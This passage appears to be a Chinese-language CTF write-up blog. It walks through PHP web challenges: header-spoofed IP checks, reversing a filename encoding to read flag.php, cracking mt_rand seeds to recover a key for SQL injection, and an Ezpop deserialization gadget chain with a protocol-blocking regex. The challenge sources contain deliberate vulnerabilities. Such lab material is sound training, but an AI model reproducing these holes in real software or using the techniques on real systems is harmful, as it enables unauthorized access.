</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;Merak&#39;</span><span class="p">])){</span> 
</span></span><span class="line"><span class="cl">    <span class="nx">highlight_file</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">);</span> 
</span></span><span class="line"><span class="cl">    <span class="k">die</span><span class="p">();</span> 
</span></span><span class="line"><span class="cl"><span class="p">}</span> 
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">function</span> <span class="nf">change</span><span class="p">(</span><span class="nv">$v</span><span class="p">){</span> 
</span></span><span class="line"><span class="cl">    <span class="nv">$v</span> <span class="o">=</span> <span class="nx">base64_decode</span><span class="p">(</span><span class="nv">$v</span><span class="p">);</span> 
</span></span><span class="line"><span class="cl">    <span class="nv">$re</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span> 
</span></span><span class="line"><span class="cl">    <span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o">&lt;</span><span class="nx">strlen</span><span class="p">(</span><span class="nv">$v</span><span class="p">);</span><span class="nv">$i</span><span class="o">++</span><span class="p">){</span> 
</span></span><span class="line"><span class="cl">        <span class="nv">$re</span> <span class="o">.=</span> <span class="nx">chr</span> <span class="p">(</span> <span class="nx">ord</span> <span class="p">(</span><span class="nv">$v</span><span class="p">[</span><span class="nv">$i</span><span class="p">])</span> <span class="o">+</span> <span class="nv">$i</span><span class="o">*</span><span class="mi">2</span> <span class="p">);</span> 
</span></span><span class="line"><span class="cl">    <span class="p">}</span> 
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="nv">$re</span><span class="p">;</span> 
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">echo</span> <span class="s1">&#39;Local access only!&#39;</span><span class="o">.</span><span class="s2">&#34;&lt;br/&gt;&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nv">$ip</span> <span class="o">=</span> <span class="nx">getIp</span><span class="p">();</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="nv">$ip</span><span class="o">!=</span><span class="s1">&#39;127.0.0.1&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">echo</span> <span class="s2">&#34;Sorry,you don&#39;t have permission!  Your ip is :&#34;</span><span class="o">.</span><span class="nv">$ip</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="nv">$ip</span> <span class="o">===</span> <span class="s1">&#39;127.0.0.1&#39;</span> <span class="o">&amp;&amp;</span> <span class="nx">file_get_contents</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;2333&#39;</span><span class="p">])</span> <span class="o">===</span> <span class="s1">&#39;todat is a happy day&#39;</span> <span class="p">){</span>
</span></span><span class="line"><span class="cl"><span class="k">echo</span> <span class="s2">&#34;Your REQUEST is:&#34;</span><span class="o">.</span><span class="nx">change</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;file&#39;</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="k">echo</span> <span class="nx">file_get_contents</span><span class="p">(</span><span class="nx">change</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;file&#39;</span><span class="p">]));</span> <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="cp">?&gt;</span><span class="err"> 
</span></span></span></code></pre></td></tr></table>
</div>
</div><p>这里有个逆向</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="c1">#ord — 转换字符串第一个字节为 0-255 之间的值
</span></span></span><span class="line"><span class="cl"><span class="c1">#chr — 返回指定的字符
</span></span></span><span class="line"><span class="cl"><span class="c1">#两个是互补的 整个意思就是
</span></span></span><span class="line"><span class="cl"><span class="c1">#$_GET[&#39;file&#39;]最后要变成flag.php
</span></span></span><span class="line"><span class="cl"><span class="c1">#1.base64解码
</span></span></span><span class="line"><span class="cl"><span class="c1">#2.逐位ord后加02468....后返回
</span></span></span><span class="line"><span class="cl"><span class="c1">#稍微改一下写个php脚本就行
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="nv">$v</span><span class="o">=</span><span class="s2">&#34;flag.php&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="k">function</span> <span class="nf">change</span><span class="p">(</span><span class="nv">$v</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$re</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o">&lt;</span><span class="nx">strlen</span><span class="p">(</span><span class="nv">$v</span><span class="p">);</span><span class="nv">$i</span><span class="o">++</span><span class="p">){</span>
</span></span><span class="line"><span class="cl"><span class="c1">//        $re .= chr ( ord ($v[$i]) + $i*2 );
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>        <span class="nv">$re</span> <span class="o">.=</span> <span class="nx">chr</span> <span class="p">(</span> <span class="nx">ord</span> <span class="p">(</span><span class="nv">$v</span><span class="p">[</span><span class="nv">$i</span><span class="p">])</span> <span class="o">-</span> <span class="nv">$i</span><span class="o">*</span><span class="mi">2</span> <span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="nv">$re</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">echo</span> <span class="nx">base64_encode</span><span class="p">(</span><span class="nx">change</span><span class="p">(</span><span class="nv">$v</span><span class="p">));</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="https://img-blog.csdnimg.cn/20200330122116332.png" alt="" /><br />
这题改xff是不行的 要改 client-ip 原因看源码</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="c1">#takeip.php
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="k">function</span> <span class="nf">getIp</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;HTTP_CLIENT_IP&#34;</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="nx">strcasecmp</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;HTTP_CLIENT_IP&#34;</span><span class="p">],</span> <span class="s2">&#34;unknown&#34;</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$ip</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;HTTP_CLIENT_IP&#34;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;HTTP_X_FORWARDED_FOR&#34;</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="nx">strcasecmp</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;HTTP_X_FORWARDED_FOR&#34;</span><span class="p">],</span> <span class="s2">&#34;unknown&#34;</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span>  <span class="s2">&#34;sorry,this way is banned!&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;REMOTE_ADDR&#34;</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="nx">strcasecmp</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;REMOTE_ADDR&#34;</span><span class="p">],</span> <span class="s2">&#34;unknown&#34;</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">                <span class="nv">$ip</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">&#34;REMOTE_ADDR&#34;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">            <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">                <span class="k">if</span> <span class="p">(</span><span class="nx">isset</span> <span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;REMOTE_ADDR&#39;</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;REMOTE_ADDR&#39;</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="nx">strcasecmp</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;REMOTE_ADDR&#39;</span><span class="p">],</span>
</span></span><span class="line"><span class="cl">                        <span class="s2">&#34;unknown&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                <span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">                    <span class="nv">$ip</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;REMOTE_ADDR&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">                <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">                    <span class="nv">$ip</span> <span class="o">=</span> <span class="s2">&#34;unknown&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">                <span class="p">}</span>
</span></span><span class="line"><span class="cl">            <span class="p">}</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="p">(</span><span class="nv">$ip</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="ezaudit">Ezaudit</h3>
<p>进去一个很正经的网站 链接全没用 就是个空网站</p>
<p>扫站看到令人欣慰的绿色</p>
<p><img src="https://img-blog.csdnimg.cn/20200330124558780.png" alt="" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="c1">#压缩包就一个login.php
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="nx">header</span><span class="p">(</span><span class="s1">&#39;Content-type:text/html; charset=utf-8&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nx">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;login&#39;</span><span class="p">])){</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$username</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$password</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;password&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$Private_key</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;Private_key&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">((</span><span class="nv">$username</span> <span class="o">==</span> <span class="s1">&#39;&#39;</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="nv">$password</span> <span class="o">==</span> <span class="s1">&#39;&#39;</span><span class="p">)</span> <span class="o">||</span><span class="p">(</span><span class="nv">$Private_key</span> <span class="o">==</span> <span class="s1">&#39;&#39;</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="c1">// 若为空,视为未填写,提示错误,并3秒后返回登录界面
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>        <span class="nx">header</span><span class="p">(</span><span class="s1">&#39;refresh:2; url=login.html&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">echo</span> <span class="s2">&#34;用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">exit</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="nv">$Private_key</span> <span class="o">!=</span> <span class="s1">&#39;*************&#39;</span> <span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nx">header</span><span class="p">(</span><span class="s1">&#39;refresh:2; url=login.html&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">echo</span> <span class="s2">&#34;假密钥，咋会让你登录?crispr会让你在2秒后跳转到登录界面的!&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">exit</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">else</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span><span class="p">(</span><span class="nv">$Private_key</span> <span class="o">===</span> <span class="s1">&#39;************&#39;</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$getuser</span> <span class="o">=</span> <span class="s2">&#34;SELECT flag FROM user WHERE username= &#39;crispr&#39; AND password = &#39;</span><span class="si">$password</span><span class="s2">&#39;&#34;</span><span class="o">.</span><span class="s1">&#39;;&#39;</span><span class="p">;</span> 
</span></span><span class="line"><span class="cl">        <span class="nv">$link</span><span class="o">=</span><span class="nx">mysql_connect</span><span class="p">(</span><span class="s2">&#34;localhost&#34;</span><span class="p">,</span><span class="s2">&#34;root&#34;</span><span class="p">,</span><span class="s2">&#34;root&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="nx">mysql_select_db</span><span class="p">(</span><span class="s2">&#34;test&#34;</span><span class="p">,</span><span class="nv">$link</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$result</span> <span class="o">=</span> <span class="nx">mysql_query</span><span class="p">(</span><span class="nv">$getuser</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">while</span><span class="p">(</span><span class="nv">$row</span><span class="o">=</span><span class="nx">mysql_fetch_assoc</span><span class="p">(</span><span class="nv">$result</span><span class="p">)){</span>
</span></span><span class="line"><span class="cl">            <span class="k">echo</span> <span class="s2">&#34;&lt;tr&gt;&lt;td&gt;&#34;</span><span class="o">.</span><span class="nv">$row</span><span class="p">[</span><span class="s2">&#34;username&#34;</span><span class="p">]</span><span class="o">.</span><span class="s2">&#34;&lt;/td&gt;&lt;td&gt;&#34;</span><span class="o">.</span><span class="nv">$row</span><span class="p">[</span><span class="s2">&#34;flag&#34;</span><span class="p">]</span><span class="o">.</span><span class="s2">&#34;&lt;/td&gt;&lt;td&gt;&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">}</span> 
</span></span><span class="line"><span class="cl"><span class="c1">// genarate public_key 
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="k">function</span> <span class="nf">public_key</span><span class="p">(</span><span class="nv">$length</span> <span class="o">=</span> <span class="mi">16</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$strings1</span> <span class="o">=</span> <span class="s1">&#39;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$public_key</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="p">(</span> <span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;</span> <span class="nv">$length</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span> <span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$public_key</span> <span class="o">.=</span> <span class="nx">substr</span><span class="p">(</span><span class="nv">$strings1</span><span class="p">,</span> <span class="nx">mt_rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">strlen</span><span class="p">(</span><span class="nv">$strings1</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="nv">$public_key</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">  <span class="c1">//genarate private_key
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>  <span class="k">function</span> <span class="nf">private_key</span><span class="p">(</span><span class="nv">$length</span> <span class="o">=</span> <span class="mi">12</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$strings2</span> <span class="o">=</span> <span class="s1">&#39;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$private_key</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="p">(</span> <span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;</span> <span class="nv">$length</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span> <span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$private_key</span> <span class="o">.=</span> <span class="nx">substr</span><span class="p">(</span><span class="nv">$strings2</span><span class="p">,</span> <span class="nx">mt_rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">strlen</span><span class="p">(</span><span class="nv">$strings2</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="nv">$private_key</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl">  <span class="nv">$Public_key</span> <span class="o">=</span> <span class="nx">public_key</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">  <span class="c1">//$Public_key = KVQP0LdJKRaV3n9D  how to get crispr&#39;s private_key???
</span></span></span></code></pre></td></tr></table>
</div>
</div><p>简单分析就是让你用公钥找私钥 然后连数据库 password 这里有个简单的SQL注入</p>
<p>这是个伪随机数	mt_scrand()和mt_rand() 使用脚本php_mt_seed爆破<br />
<img src="https://img-blog.csdnimg.cn/20200330140522374.png" alt="" /><br />
种子 1775196155 生成私钥 XuNhoueCDCGc<br />
<img src="https://img-blog.csdnimg.cn/2020033013180288.png" alt="" /></p>
<h3 id="ezpop">Ezpop</h3>
<p>进去直接是源码 提示 flag在flag.php</p>
<p>让学习 反序列化魔法方法	就是个反序列化的题</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="nx">Welcome</span> <span class="nx">to</span> <span class="nx">index</span><span class="o">.</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="c1">//flag is in flag.php
</span></span></span><span class="line"><span class="cl"><span class="c1">//WTF IS THIS?
</span></span></span><span class="line"><span class="cl"><span class="c1">//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
</span></span></span><span class="line"><span class="cl"><span class="c1">//And Crack It!
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="k">class</span> <span class="nc">Modifier</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">protected</span>  <span class="nv">$var</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="nf">append</span><span class="p">(</span><span class="nv">$value</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="k">include</span><span class="p">(</span><span class="nv">$value</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__invoke</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">append</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">var</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Show</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$source</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$str</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">(</span><span class="nv">$file</span><span class="o">=</span><span class="s1">&#39;index.php&#39;</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">source</span> <span class="o">=</span> <span class="nv">$file</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">echo</span> <span class="s1">&#39;Welcome to &#39;</span><span class="o">.</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">source</span><span class="o">.</span><span class="s2">&#34;&lt;br&gt;&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__toString</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">str</span><span class="o">-&gt;</span><span class="na">source</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__wakeup</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span><span class="p">(</span><span class="nx">preg_match</span><span class="p">(</span><span class="s2">&#34;/gopher|http|file|ftp|https|dict|\.\./i&#34;</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">source</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">echo</span> <span class="s2">&#34;hacker&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">source</span> <span class="o">=</span> <span class="s2">&#34;index.php&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Test</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$p</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">p</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__get</span><span class="p">(</span><span class="nv">$key</span><span class="p">){</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$function</span> <span class="o">=</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">p</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="nv">$function</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
